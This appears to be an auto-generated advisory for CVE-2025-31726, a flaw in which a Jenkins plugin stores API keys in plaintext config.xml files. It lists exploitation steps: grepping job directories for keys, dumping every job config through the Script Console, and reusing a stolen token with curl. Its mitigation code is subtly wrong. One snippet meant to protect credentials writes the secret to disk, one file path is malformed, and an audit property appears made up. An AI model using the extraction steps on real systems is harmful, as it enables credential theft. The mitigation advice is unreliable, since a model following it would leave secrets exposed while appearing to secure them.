Listen to this Post
How CVE-2025-31726 Works
The Jenkins Stack Hammer Plugin (v1.0.6 and earlier) stores API keys in plaintext within `config.xml` files on the Jenkins controller. These keys are accessible to users with Extended Read permissions or anyone with filesystem access to the controller. The exposure occurs due to insufficient encryption of sensitive credentials in job configurations, allowing unauthorized retrieval of API keys, which could lead to privilege escalation or unauthorized API access.
DailyCVE Form
Platform: Jenkins
Version: ≤1.0.6
Vulnerability: Plaintext API Key Storage
Severity: Medium
Date: 04/17/2025
What Undercode Say:
Exploitation:
1. Manual Extraction:
grep -r "api_key" /var/lib/jenkins/jobs/
2. Jenkins Script Console:
Jenkins.instance.getAllItems().each { job ->
println("Job: ${job.name}, Config: ${job.configFile.asString()}")
}
3. API Key Abuse:
curl -X POST -H "Authorization: Bearer [bash]" https://api.targethost.com/endpoint
Mitigation:
1. Upgrade Plugin:
jenkins-plugin-cli --update Stack-Hammer --version 1.0.7
2. Credential Encryption:
// Use Jenkins Credentials Binding Plugin
withCredentials([string(credentialsId: 'secure-key', variable: 'API_KEY')]) {
sh 'echo $API_KEY > /secure/path'
}
3. File Permissions:
chmod 600 /var/lib/jenkins/jobs//config.xml
4. Audit Logging:
// Log access to config.xml
System.setProperty("jenkins.security.ApiKeyFilter.audit", "true")
Detection:
1. YARA Rule:
rule jenkins_api_key_leak {
strings: $xml = "<apiKey>" nocase
condition: $xml
}
2. Jenkins Audit Plugin:
jenkins-cli install-plugin audit-trail
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
